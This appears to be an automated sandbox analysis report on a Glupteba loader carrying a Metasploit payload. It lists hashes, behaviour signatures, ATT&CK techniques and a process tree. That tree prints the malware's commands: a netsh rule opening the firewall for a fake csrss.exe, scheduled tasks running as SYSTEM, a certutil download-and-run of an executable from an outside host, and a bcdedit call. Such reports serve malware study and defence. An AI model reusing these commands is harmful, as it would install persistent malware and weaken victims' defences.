Analysis

  • max time kernel
    176s
  • max time network
    183s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-06-2022 10:20

General

  • Target

    1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf.exe

  • Size

    3.9MB

  • MD5

    fb5106b00132654be98257e2ba38a950

  • SHA1

    f462763f1c9881eb97c085382ffd4674d304c8d2

  • SHA256

    1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf

  • SHA512

    81038ec7ba4c9c4661625c16ceb3ce425b2afea09c47f7c1d46050be8c94022f5e81af6b9b5accf483d7ab1f2fa60e6eeae8883cac945fde68ff5ecab7069863

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 8 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf.exe
    "C:\Users\Admin\AppData\Local\Temp\1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2192
    • C:\Users\Admin\AppData\Local\Temp\1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf.exe
      "C:\Users\Admin\AppData\Local\Temp\1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4588
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:2332
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4288
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:840
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:208
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:3600
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3000
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4500

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    fb5106b00132654be98257e2ba38a950

    SHA1

    f462763f1c9881eb97c085382ffd4674d304c8d2

    SHA256

    1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf

    SHA512

    81038ec7ba4c9c4661625c16ceb3ce425b2afea09c47f7c1d46050be8c94022f5e81af6b9b5accf483d7ab1f2fa60e6eeae8883cac945fde68ff5ecab7069863

  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    fb5106b00132654be98257e2ba38a950

    SHA1

    f462763f1c9881eb97c085382ffd4674d304c8d2

    SHA256

    1105c6506d94d440e44ce637e0e7d87c7aed386cf99d870f9bea04e3655614bf

    SHA512

    81038ec7ba4c9c4661625c16ceb3ce425b2afea09c47f7c1d46050be8c94022f5e81af6b9b5accf483d7ab1f2fa60e6eeae8883cac945fde68ff5ecab7069863

  • memory/208-146-0x0000000000000000-mapping.dmp
  • memory/840-147-0x0000000000000000-mapping.dmp
  • memory/2192-135-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/2192-131-0x0000000003A80000-0x0000000004282000-memory.dmp
    Filesize

    8.0MB

  • memory/2192-132-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/2192-134-0x0000000003A80000-0x0000000004282000-memory.dmp
    Filesize

    8.0MB

  • memory/2192-130-0x00000000036CA000-0x0000000003A71000-memory.dmp
    Filesize

    3.7MB

  • memory/2332-137-0x0000000000000000-mapping.dmp
  • memory/3000-150-0x0000000000000000-mapping.dmp
  • memory/3600-148-0x0000000000000000-mapping.dmp
  • memory/4288-140-0x0000000000000000-mapping.dmp
  • memory/4288-144-0x0000000003C00000-0x0000000003FA7000-memory.dmp
    Filesize

    3.7MB

  • memory/4288-145-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/4288-151-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/4504-136-0x0000000000000000-mapping.dmp
  • memory/4588-139-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/4588-143-0x0000000000400000-0x0000000003355000-memory.dmp
    Filesize

    47.3MB

  • memory/4588-133-0x0000000000000000-mapping.dmp
  • memory/4588-138-0x000000000373F000-0x0000000003AE6000-memory.dmp
    Filesize

    3.7MB